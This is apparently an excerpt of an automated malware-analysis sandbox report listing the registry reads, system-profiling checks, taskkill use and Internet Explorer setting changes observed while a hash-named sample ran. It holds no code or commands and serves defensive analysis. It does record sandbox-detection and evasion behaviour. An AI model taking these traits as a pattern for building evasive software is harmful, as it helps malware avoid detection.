Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
